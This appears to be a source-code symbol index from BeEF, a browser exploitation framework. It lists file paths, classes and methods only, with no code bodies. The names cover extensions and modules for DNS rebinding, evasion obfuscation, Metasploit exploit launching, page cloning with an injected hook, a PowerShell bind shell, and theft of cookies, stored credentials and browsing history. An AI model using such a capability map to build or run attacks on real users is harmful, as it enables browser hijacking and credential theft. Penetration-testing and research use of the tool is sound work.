type API (line 9) | module API
type ServHandler (line 10) | module ServHandler
function pre_http_start (line 17) | def self.pre_http_start(_http_hook_server)
FILE: extensions/dns_rebinding/dns_rebinding.rb
type BeEF (line 1) | module BeEF
type Extension (line 2) | module Extension
type DNSRebinding (line 3) | module DNSRebinding
class Server (line 5) | class Server
method log (line 7) | def self.log(msg)
method run_server (line 11) | def self.run_server(address, port)
class Proxy (line 59) | class Proxy
method send_http_response (line 66) | def self.send_http_response(socket, response, heads = {})
method log (line 91) | def self.log(log_message)
method read_http_message (line 95) | def self.read_http_message(socket)
method handle_victim (line 116) | def self.handle_victim(socket, http_message)
method handle_owner (line 172) | def self.handle_owner(socket, http_message)
method run_server (line 205) | def self.run_server(address, port)
FILE: extensions/dns_rebinding/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type DNSRebinding (line 8) | module DNSRebinding
FILE: extensions/etag/api.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type ETag (line 8) | module ETag
type API (line 9) | module API
type ETagHandler (line 10) | module ETagHandler
function mount_handler (line 17) | def self.mount_handler(beef_server)
FILE: extensions/etag/etag.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type ETag (line 8) | module ETag
class ETagMessages (line 12) | class ETagMessages
method initialize (line 16) | def initialize
class ETagWebServer (line 21) | class ETagWebServer < Sinatra::Base
method create_ET_header (line 22) | def create_ET_header
FILE: extensions/etag/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type ETag (line 8) | module ETag
FILE: extensions/evasion/evasion.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Evasion (line 8) | module Evasion
class Evasion (line 9) | class Evasion
method initialize (line 15) | def initialize
method load_techniques (line 30) | def load_techniques
method obfuscate (line 50) | def obfuscate(input)
method add_bootstrapper (line 54) | def add_bootstrapper
method apply_chain (line 73) | def apply_chain(input)
FILE: extensions/evasion/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Evasion (line 8) | module Evasion
FILE: extensions/evasion/obfuscation/base_64.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Evasion (line 8) | module Evasion
class Base_64 (line 9) | class Base_64
method need_bootstrap? (line 12) | def need_bootstrap?
method get_bootstrap (line 16) | def get_bootstrap
method execute (line 22) | def execute(input, _config)
FILE: extensions/evasion/obfuscation/minify.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Evasion (line 8) | module Evasion
class Minify (line 10) | class Minify
method need_bootstrap? (line 13) | def need_bootstrap?
method execute (line 17) | def execute(input, config)
FILE: extensions/evasion/obfuscation/scramble.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Evasion (line 8) | module Evasion
class Scramble (line 9) | class Scramble
method need_bootstrap? (line 12) | def need_bootstrap?
method execute (line 16) | def execute(input, config)
FILE: extensions/evasion/obfuscation/whitespace.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Evasion (line 8) | module Evasion
class Whitespace (line 9) | class Whitespace
method need_bootstrap? (line 12) | def need_bootstrap?
method get_bootstrap (line 16) | def get_bootstrap
method execute (line 41) | def execute(input, _config)
method encode (line 50) | def encode(input)
FILE: extensions/events/api.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Events (line 8) | module Events
type RegisterHttpHandler (line 12) | module RegisterHttpHandler
function mount_handler (line 15) | def self.mount_handler(beef_server)
FILE: extensions/events/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Events (line 8) | module Events
FILE: extensions/events/handler.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Events (line 8) | module Events
class Handler (line 12) | class Handler
method initialize (line 15) | def initialize(data)
method setup (line 20) | def setup
method event_log_string (line 65) | def event_log_string(event)
FILE: extensions/metasploit/api.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Metasploit (line 8) | module Metasploit
type API (line 9) | module API
type MetasploitHooks (line 10) | module MetasploitHooks
function post_soft_load (line 15) | def self.post_soft_load
function get_options (line 113) | def self.get_options(mod)
function override_execute (line 143) | def self.override_execute(mod, hbsession, opts)
function get_payload_options (line 185) | def self.get_payload_options(mod, payload)
function mount_handler (line 206) | def self.mount_handler(beef_server)
FILE: extensions/metasploit/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Metasploit (line 8) | module Metasploit
function translate_options (line 16) | def self.translate_options(msf_options)
function translate_payload (line 58) | def self.translate_payload(payloads)
function translate_enums (line 84) | def self.translate_enums(enums)
FILE: extensions/metasploit/module.rb
class Msf_module (line 8) | class Msf_module < BeEF::Core::Command
method output (line 9) | def output
FILE: extensions/metasploit/rest/msf.rb
type BeEF (line 7) | module BeEF
type Extension (line 8) | module Extension
type Metasploit (line 9) | module Metasploit
class MsfRest (line 11) | class MsfRest < BeEF::Core::Router::Router
class InvalidJsonError (line 115) | class InvalidJsonError < StandardError
method initialize (line 118) | def initialize(message = nil)
class InvalidParamError (line 124) | class InvalidParamError < StandardError
method initialize (line 127) | def initialize(message = nil)
FILE: extensions/metasploit/rpcclient.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Metasploit (line 8) | module Metasploit
class RpcClient (line 9) | class RpcClient < ::Msf::RPC::Client
method initialize (line 12) | def initialize
method launch_msfrpcd (line 61) | def launch_msfrpcd(opts)
method get_lock (line 112) | def get_lock
method release_lock (line 117) | def release_lock
method call (line 121) | def call(meth, *args)
method unit_test_init (line 129) | def unit_test_init
method login (line 134) | def login
method token_generate (line 165) | def token_generate
method browser_exploits (line 173) | def browser_exploits
method get_exploit_info (line 184) | def get_exploit_info(name)
method get_payloads (line 195) | def get_payloads(name)
method get_options (line 206) | def get_options(name)
method payloads (line 217) | def payloads
method payload_options (line 230) | def payload_options(name)
method launch_exploit (line 243) | def launch_exploit(exploit, opts)
method launch_autopwn (line 256) | def launch_autopwn
FILE: extensions/network/api.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Network (line 8) | module Network
type RegisterHttpHandler (line 9) | module RegisterHttpHandler
function mount_handler (line 15) | def self.mount_handler(beef_server)
FILE: extensions/network/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Network (line 12) | module Network
FILE: extensions/network/models/network_host.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Models (line 8) | module Models
class NetworkHost (line 12) | class NetworkHost < BeEF::Core::Model
method add (line 18) | def self.add(host = {})
method delete (line 70) | def self.delete(id)
method to_h (line 87) | def to_h
FILE: extensions/network/models/network_service.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Models (line 8) | module Models
class NetworkService (line 12) | class NetworkService < BeEF::Core::Model
method add (line 18) | def self.add(service = {})
method to_h (line 74) | def to_h
FILE: extensions/network/rest/network.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Network (line 8) | module Network
class NetworkRest (line 10) | class NetworkRest < BeEF::Core::Router::Router
class InvalidJsonError (line 167) | class InvalidJsonError < StandardError
method initialize (line 170) | def initialize(message = nil)
class InvalidParamError (line 176) | class InvalidParamError < StandardError
method initialize (line 179) | def initialize(message = nil)
FILE: extensions/notifications/channels/email.rb
type BeEF (line 10) | module BeEF
type Extension (line 11) | module Extension
type Notifications (line 12) | module Notifications
type Channels (line 13) | module Channels
class Email (line 14) | class Email
method initialize (line 18) | def initialize(to_address, message)
FILE: extensions/notifications/channels/ntfy.rb
type BeEF (line 4) | module BeEF
type Extension (line 5) | module Extension
type Notifications (line 6) | module Notifications
type Channels (line 7) | module Channels
class Ntfy (line 8) | class Ntfy
method initialize (line 11) | def initialize(message)
FILE: extensions/notifications/channels/pushover.rb
type BeEF (line 3) | module BeEF
type Extension (line 4) | module Extension
type Notifications (line 5) | module Notifications
type Channels (line 6) | module Channels
class Pushover (line 7) | class Pushover
method initialize (line 8) | def initialize(message)
FILE: extensions/notifications/channels/slack_workspace.rb
type BeEF (line 8) | module BeEF
type Extension (line 9) | module Extension
type Notifications (line 10) | module Notifications
type Channels (line 11) | module Channels
class SlackWorkspace (line 12) | class SlackWorkspace
method initialize (line 13) | def initialize(message)
FILE: extensions/notifications/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Notifications (line 8) | module Notifications
FILE: extensions/notifications/notifications.rb
type BeEF (line 13) | module BeEF
type Extension (line 14) | module Extension
type Notifications (line 15) | module Notifications
class Notifications (line 19) | class Notifications
method initialize (line 20) | def initialize(from, event, time_now, hb)
FILE: extensions/proxy/api.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Proxy (line 8) | module Proxy
type API (line 9) | module API
type RegisterHttpHandler (line 10) | module RegisterHttpHandler
function pre_http_start (line 14) | def self.pre_http_start(http_hook_server)
function mount_handler (line 23) | def self.mount_handler(beef_server)
FILE: extensions/proxy/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Proxy (line 8) | module Proxy
FILE: extensions/proxy/proxy.rb
type BeEF (line 8) | module BeEF
type Extension (line 9) | module Extension
type Proxy (line 10) | module Proxy
class Proxy (line 11) | class Proxy
method initialize (line 18) | def initialize
method handle_request (line 53) | def handle_request(socket)
method get_tunneling_proxy (line 194) | def get_tunneling_proxy
FILE: extensions/proxy/rest/proxy.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Proxy (line 8) | module Proxy
class ProxyRest (line 10) | class ProxyRest < BeEF::Core::Router::Router
class InvalidJsonError (line 61) | class InvalidJsonError < StandardError
method initialize (line 64) | def initialize(message = nil)
class InvalidParamError (line 70) | class InvalidParamError < StandardError
method initialize (line 73) | def initialize(message = nil)
FILE: extensions/qrcode/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Qrcode (line 8) | module Qrcode
FILE: extensions/qrcode/qrcode.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Qrcode (line 8) | module Qrcode
type QrcodeGenerator (line 9) | module QrcodeGenerator
function pre_http_start (line 12) | def self.pre_http_start(_http_hook_server)
FILE: extensions/requester/api.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Requester (line 8) | module Requester
type RegisterHttpHandler (line 9) | module RegisterHttpHandler
function mount_handler (line 12) | def self.mount_handler(beef_server)
type RegisterPreHookCallback (line 18) | module RegisterPreHookCallback
function pre_hook_send (line 21) | def self.pre_hook_send(hooked_browser, body, _params, _request, ...
FILE: extensions/requester/api/hook.rb
type BeEF (line 7) | module BeEF
type Extension (line 8) | module Extension
type Requester (line 9) | module Requester
type API (line 10) | module API
class Hook (line 12) | class Hook
method requester_run (line 17) | def requester_run(hb, body)
method add_to_body (line 59) | def add_to_body(output)
method requester_parse_db_request (line 83) | def requester_parse_db_request(http_db_object)
FILE: extensions/requester/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Requester (line 8) | module Requester
FILE: extensions/requester/handler.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Requester (line 8) | module Requester
class Handler (line 12) | class Handler
method initialize (line 16) | def initialize(data)
method setup (line 21) | def setup
FILE: extensions/requester/models/http.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Models (line 8) | module Models
class Http (line 12) | class Http < BeEF::Core::Model
method delete (line 16) | def self.delete(id)
FILE: extensions/requester/rest/requester.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Requester (line 8) | module Requester
class RequesterRest (line 10) | class RequesterRest < BeEF::Core::Router::Router
method request2hash (line 211) | def request2hash(http)
method response2hash (line 229) | def response2hash(http)
class InvalidJsonError (line 259) | class InvalidJsonError < StandardError
method initialize (line 262) | def initialize(message = nil)
class InvalidParamError (line 268) | class InvalidParamError < StandardError
method initialize (line 271) | def initialize(message = nil)
FILE: extensions/s2c_dns_tunnel/api.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type ServerClientDnsTunnel (line 8) | module ServerClientDnsTunnel
type API (line 9) | module API
type ServerClientDnsTunnelHandler (line 10) | module ServerClientDnsTunnelHandler
function pre_http_start (line 18) | def self.pre_http_start(_http_hook_server)
function mount_handler (line 41) | def self.mount_handler(beef_server)
FILE: extensions/s2c_dns_tunnel/dnsd.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type ServerClientDnsTunnel (line 8) | module ServerClientDnsTunnel
type RubyDNS (line 9) | module RubyDNS
class Transaction (line 10) | class Transaction
method fail! (line 11) | def fail!(rcode, domain)
class Server (line 31) | class Server < RubyDNS::Server
method initialize (line 36) | def initialize
method run (line 46) | def run(options = {})
method process (line 66) | def process(name, resource, transaction)
method format_resource (line 109) | def format_resource(resource)
FILE: extensions/s2c_dns_tunnel/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type ServerClientDnsTunnel (line 8) | module ServerClientDnsTunnel
FILE: extensions/s2c_dns_tunnel/httpd.rb
type BeEF (line 1) | module BeEF
type Extension (line 2) | module Extension
type ServerClientDnsTunnel (line 3) | module ServerClientDnsTunnel
class Httpd (line 4) | class Httpd < Sinatra::Base
method initialize (line 5) | def initialize(domain)
FILE: extensions/social_engineering/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type RegisterSEngHandler (line 8) | module RegisterSEngHandler
function mount_handler (line 9) | def self.mount_handler(server)
type SocialEngineering (line 17) | module SocialEngineering
FILE: extensions/social_engineering/models/interceptor.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Models (line 8) | module Models
class Interceptor (line 9) | class Interceptor < BeEF::Core::Model
FILE: extensions/social_engineering/models/web_cloner.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Models (line 8) | module Models
class WebCloner (line 9) | class WebCloner < BeEF::Core::Model
FILE: extensions/social_engineering/powershell/bind_powershell.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type SocialEngineering (line 8) | module SocialEngineering
class Bind_powershell (line 15) | class Bind_powershell < BeEF::Core::Router::Router
FILE: extensions/social_engineering/rest/socialengineering.rb
type BeEF (line 7) | module BeEF
type Extension (line 8) | module Extension
type SocialEngineering (line 9) | module SocialEngineering
class SEngRest (line 10) | class SEngRest < BeEF::Core::Router::Router
FILE: extensions/social_engineering/web_cloner/interceptor.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type SocialEngineering (line 8) | module SocialEngineering
class Interceptor (line 10) | class Interceptor < Sinatra::Base
FILE: extensions/social_engineering/web_cloner/web_cloner.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type SocialEngineering (line 8) | module SocialEngineering
class WebCloner (line 9) | class WebCloner
method initialize (line 13) | def initialize
method clone_page (line 20) | def clone_page(url, mount, use_existing, dns_spoof)
method add_beef_hook (line 155) | def add_beef_hook(line)
method url_is_frameable? (line 167) | def url_is_frameable?(url)
method get_page_content (line 195) | def get_page_content(file_path)
method persist_page (line 202) | def persist_page(uri, mount)
FILE: extensions/webrtc/api.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type WebRTC (line 8) | module WebRTC
type RegisterHttpHandler (line 10) | module RegisterHttpHandler
function mount_handler (line 18) | def self.mount_handler(beef_server)
type RegisterPreHookCallback (line 26) | module RegisterPreHookCallback
function pre_hook_send (line 32) | def self.pre_hook_send(hooked_browser, body, params, request, re...
FILE: extensions/webrtc/api/hook.rb
type BeEF (line 10) | module BeEF
type Extension (line 11) | module Extension
type WebRTC (line 12) | module WebRTC
type API (line 13) | module API
class Hook (line 16) | class Hook
method requester_run (line 26) | def requester_run(hb, body)
method add_rtcsignal_to_body (line 78) | def add_rtcsignal_to_body(output)
method add_rtcmanagement_to_body (line 98) | def add_rtcmanagement_to_body(output)
FILE: extensions/webrtc/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type WebRTC (line 8) | module WebRTC
FILE: extensions/webrtc/handlers.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type WebRTC (line 8) | module WebRTC
class SignalHandler (line 13) | class SignalHandler
method initialize (line 18) | def initialize(data)
method setup (line 23) | def setup()
class MessengeHandler (line 59) | class MessengeHandler
method initialize (line 63) | def initialize(data)
method setup (line 68) | def setup()
FILE: extensions/webrtc/models/rtcmanage.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Models (line 8) | module Models
class RtcManage (line 12) | class RtcManage < BeEF::Core::Model
method initiate (line 15) | def self.initiate(caller, receiver, verbosity = false)
method sendmsg (line 31) | def self.sendmsg(from, to, message)
method status (line 38) | def self.status(id)
FILE: extensions/webrtc/models/rtcmodulestatus.rb
type BeEF (line 7) | module BeEF
type Core (line 8) | module Core
type Models (line 9) | module Models
class Rtcmodulestatus (line 16) | class Rtcmodulestatus < BeEF::Core::Model
FILE: extensions/webrtc/models/rtcsignal.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Models (line 8) | module Models
class RtcSignal (line 12) | class RtcSignal < BeEF::Core::Model
FILE: extensions/webrtc/models/rtcstatus.rb
type BeEF (line 7) | module BeEF
type Core (line 8) | module Core
type Models (line 9) | module Models
class Rtcstatus (line 16) | class Rtcstatus < BeEF::Core::Model
FILE: extensions/webrtc/rest/webrtc.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type WebRTC (line 8) | module WebRTC
class WebRTCRest (line 13) | class WebRTCRest < BeEF::Core::Router::Router
class InvalidJsonError (line 456) | class InvalidJsonError < StandardError
method initialize (line 459) | def initialize(message = nil)
class InvalidParamError (line 465) | class InvalidParamError < StandardError
method initialize (line 468) | def initialize(message = nil)
FILE: extensions/xssrays/api.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Xssrays (line 8) | module Xssrays
type RegisterHttpHandler (line 9) | module RegisterHttpHandler
function mount_handler (line 17) | def self.mount_handler(beef_server)
type RegisterPreHookCallback (line 26) | module RegisterPreHookCallback
function pre_hook_send (line 30) | def self.pre_hook_send(hooked_browser, body, _params, _request, ...
FILE: extensions/xssrays/api/scan.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Xssrays (line 8) | module Xssrays
type API (line 9) | module API
class Scan (line 10) | class Scan
method start_scan (line 16) | def start_scan(hb, body)
method add_to_body (line 67) | def add_to_body(id, session, beefurl, cross_origin, timeout)
FILE: extensions/xssrays/extension.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Xssrays (line 8) | module Xssrays
FILE: extensions/xssrays/handler.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Xssrays (line 8) | module Xssrays
class Handler (line 9) | class Handler < BeEF::Core::Router::Router
method parse_rays (line 52) | def parse_rays(rays_scan_id)
method finalize_scan (line 75) | def finalize_scan(rays_scan_id)
FILE: extensions/xssrays/models/xssraysdetail.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Models (line 8) | module Models
class Xssraysdetail (line 12) | class Xssraysdetail < BeEF::Core::Model
FILE: extensions/xssrays/models/xssraysscan.rb
type BeEF (line 6) | module BeEF
type Core (line 7) | module Core
type Models (line 8) | module Models
class Xssraysscan (line 12) | class Xssraysscan < BeEF::Core::Model
FILE: extensions/xssrays/rest/xssrays.rb
type BeEF (line 6) | module BeEF
type Extension (line 7) | module Extension
type Xssrays (line 8) | module Xssrays
class XssraysRest (line 10) | class XssraysRest < BeEF::Core::Router::Router
method ray2hash (line 166) | def ray2hash(ray)
method scan2hash (line 177) | def scan2hash(scan)
class InvalidJsonError (line 192) | class InvalidJsonError < StandardError
method initialize (line 195) | def initialize(message = nil)
class InvalidParamError (line 201) | class InvalidParamError < StandardError
method initialize (line 204) | def initialize(message = nil)
FILE: modules/browser/avant_steal_history/module.rb
class Avant_steal_history (line 16) | class Avant_steal_history < BeEF::Core::Command
method options (line 17) | def self.options
method post_execute (line 23) | def post_execute
FILE: modules/browser/browser_fingerprinting/command.js
function unique (line 13) | function unique(array) {
FILE: modules/browser/browser_fingerprinting/module.rb
class Browser_fingerprinting (line 9) | class Browser_fingerprinting < BeEF::Core::Command
method post_execute (line 10) | def post_execute
FILE: modules/browser/detect_activex/module.rb
class Detect_activex (line 6) | class Detect_activex < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_evernote_clipper/module.rb
class Detect_evernote_clipper (line 6) | class Detect_evernote_clipper < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_extensions/module.rb
class Detect_extensions (line 10) | class Detect_extensions < BeEF::Core::Command
method post_execute (line 11) | def post_execute
FILE: modules/browser/detect_firebug/module.rb
class Detect_firebug (line 6) | class Detect_firebug < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_foxit/module.rb
class Detect_foxit (line 6) | class Detect_foxit < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_lastpass/command.js
function getResult (line 70) | function getResult() {
FILE: modules/browser/detect_lastpass/module.rb
class Detect_lastpass (line 6) | class Detect_lastpass < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_mime_types/module.rb
class Detect_mime_types (line 7) | class Detect_mime_types < BeEF::Core::Command
method post_execute (line 8) | def post_execute
FILE: modules/browser/detect_office/module.rb
class Detect_office (line 6) | class Detect_office < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_popup_blocker/module.rb
class Detect_popup_blocker (line 6) | class Detect_popup_blocker < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_quicktime/module.rb
class Detect_quicktime (line 6) | class Detect_quicktime < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_realplayer/module.rb
class Detect_realplayer (line 6) | class Detect_realplayer < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_silverlight/module.rb
class Detect_silverlight (line 6) | class Detect_silverlight < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_simple_adblock/module.rb
class Detect_simple_adblock (line 6) | class Detect_simple_adblock < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_toolbars/module.rb
class Detect_toolbars (line 6) | class Detect_toolbars < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_unity/module.rb
class Detect_unity (line 6) | class Detect_unity < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_unsafe_activex/module.rb
class Detect_unsafe_activex (line 6) | class Detect_unsafe_activex < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_vlc/module.rb
class Detect_vlc (line 6) | class Detect_vlc < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/detect_wmp/module.rb
class Detect_wmp (line 6) | class Detect_wmp < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/fingerprint_browser/module.rb
class Fingerprint_browser (line 7) | class Fingerprint_browser < BeEF::Core::Command
method post_execute (line 8) | def post_execute
FILE: modules/browser/get_visited_domains/command.js
function timer_interrupt (line 28) | function timer_interrupt() {
function sched_call (line 195) | function sched_call(fn) {
function perform_check (line 215) | function perform_check() {
function wait_for_read (line 230) | function wait_for_read() {
function wait_for_read2 (line 267) | function wait_for_read2() {
function navigate_to_target (line 282) | function navigate_to_target() {
function wait_for_noread (line 303) | function wait_for_noread() {
function maybe_test_next (line 345) | function maybe_test_next() {
function log_text (line 383) | function log_text(str, type, cssclass) {
function reload (line 393) | function reload(){
function start_stuff (line 405) | function start_stuff() {
function visipisiCB (line 463) | function visipisiCB(vp, endCB, sites, urls, site, result){
function getVisitedDomains (line 479) | function getVisitedDomains(){
function prepResult (line 538) | function prepResult(results){
FILE: modules/browser/get_visited_domains/module.rb
class Get_visited_domains (line 7) | class Get_visited_domains < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 20) | def post_execute
FILE: modules/browser/get_visited_urls/module.rb
class Get_visited_urls (line 6) | class Get_visited_urls < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 18) | def post_execute
FILE: modules/browser/hooked_origin/ajax_fingerprint/command.js
function unique (line 14) | function unique(array) {
function fp (line 49) | function fp() {
FILE: modules/browser/hooked_origin/ajax_fingerprint/module.rb
class Ajax_fingerprint (line 7) | class Ajax_fingerprint < BeEF::Core::Command
method post_execute (line 8) | def post_execute
FILE: modules/browser/hooked_origin/alert_dialog/module.rb
class Alert_dialog (line 6) | class Alert_dialog < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 19) | def post_execute
FILE: modules/browser/hooked_origin/apache_tomcat_examples_cookie_disclosure/command.js
function parseResponse (line 10) | function parseResponse() {
FILE: modules/browser/hooked_origin/apache_tomcat_examples_cookie_disclosure/module.rb
class Apache_tomcat_examples_cookie_disclosure (line 6) | class Apache_tomcat_examples_cookie_disclosure < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/browser/hooked_origin/cisco_asa_password_disclosure/module.rb
class Cisco_asa_passwords (line 6) | class Cisco_asa_passwords < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/hooked_origin/clear_console/module.rb
class Clear_console (line 6) | class Clear_console < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/hooked_origin/deface_web_page/module.rb
class Deface_web_page (line 6) | class Deface_web_page < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 24) | def post_execute
FILE: modules/browser/hooked_origin/deface_web_page_component/module.rb
class Deface_web_page_component (line 6) | class Deface_web_page_component < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/browser/hooked_origin/disable_developer_tools/module.rb
class Disable_developer_tools (line 6) | class Disable_developer_tools < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/hooked_origin/get_autocomplete_creds/module.rb
class Get_autocomplete_creds (line 6) | class Get_autocomplete_creds < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 11) | def post_execute
FILE: modules/browser/hooked_origin/get_cookie/module.rb
class Get_cookie (line 6) | class Get_cookie < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/hooked_origin/get_form_values/module.rb
class Get_form_values (line 6) | class Get_form_values < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/hooked_origin/get_local_storage/module.rb
class Get_local_storage (line 6) | class Get_local_storage < BeEF::Core::Command
method post_execute (line 12) | def post_execute
FILE: modules/browser/hooked_origin/get_page_html/module.rb
class Get_page_html (line 6) | class Get_page_html < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/hooked_origin/get_page_html_iframe/module.rb
class Get_page_html_iframe (line 6) | class Get_page_html_iframe < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/hooked_origin/get_page_links/module.rb
class Get_page_links (line 6) | class Get_page_links < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/hooked_origin/get_session_storage/module.rb
class Get_session_storage (line 6) | class Get_session_storage < BeEF::Core::Command
method post_execute (line 12) | def post_execute
FILE: modules/browser/hooked_origin/get_stored_credentials/command.js
function waituntilok (line 22) | function waituntilok() {
FILE: modules/browser/hooked_origin/get_stored_credentials/module.rb
class Get_stored_credentials (line 6) | class Get_stored_credentials < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 20) | def post_execute
FILE: modules/browser/hooked_origin/link_rewrite/module.rb
class Link_rewrite (line 6) | class Link_rewrite < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/browser/hooked_origin/link_rewrite_click_events/module.rb
class Link_rewrite_click_events (line 6) | class Link_rewrite_click_events < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/browser/hooked_origin/link_rewrite_sslstrip/module.rb
class Link_rewrite_sslstrip (line 6) | class Link_rewrite_sslstrip < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/hooked_origin/link_rewrite_tel/module.rb
class Link_rewrite_tel (line 6) | class Link_rewrite_tel < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/browser/hooked_origin/mobilesafari_address_spoofing/module.rb
class Mobilesafari_address_spoofing (line 6) | class Mobilesafari_address_spoofing < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/browser/hooked_origin/overflow_cookiejar/command.js
function setCookie (line 15) | function setCookie(cname,cvalue){
function getCookie (line 19) | function getCookie(cname){
function deleteAllCookies (line 30) | function deleteAllCookies(){
function overflowCookie (line 57) | function overflowCookie() {
function overflowCookieJar (line 69) | function overflowCookieJar(){
FILE: modules/browser/hooked_origin/overflow_cookiejar/module.rb
class Overflow_cookiejar (line 6) | class Overflow_cookiejar < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/browser/hooked_origin/prompt_dialog/module.rb
class Prompt_dialog (line 6) | class Prompt_dialog < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 17) | def post_execute
FILE: modules/browser/hooked_origin/remove_stuck_iframes/module.rb
class Remove_stuck_iframes (line 6) | class Remove_stuck_iframes < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/hooked_origin/replace_video/module.rb
class Replace_video (line 6) | class Replace_video < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/browser/hooked_origin/rickroll/module.rb
